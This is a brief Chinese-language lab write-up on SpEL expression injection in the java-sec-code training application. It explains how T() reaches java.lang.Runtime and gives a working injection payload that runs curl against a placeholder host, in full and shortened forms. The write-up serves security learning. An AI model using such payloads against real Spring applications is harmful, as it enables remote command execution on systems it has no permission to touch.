[Java-sec-code]SpEL表达式注入

文章目录

• ​​SpEL​​
• ​​SpEL表达式注入​​

SpEL

我们学安全主要了解那些对我们有用的东西，在这里有一篇链接方便大家进行了解https://www.jianshu.com/p/e0b50053b5d3
此外，我觉得其中最重要的是​​​通过 T() 调用一个类的静态方法，它将返回一个 Class Object，然后再调用相应的方法或属性：​​​，并且如果包在​​java.lang​​下面可以省略这一部分，因此我们便可以利用此方法调用Runtime执行命令

SpEL表达式注入

在​​org/joychou/controller/SpEL.java​​下面，在这里获取get传入的expression参数，并对其进行解析

因此我们只需要构造

T(java.lang.Runtime).getRuntime().exec("curl http://xxx.xx.xx?a=Y4tacker")

简化一下就是

T(Runtime).getRuntime().exec("curl http://xxx.xx.xx?a=Y4tacker")

成功执行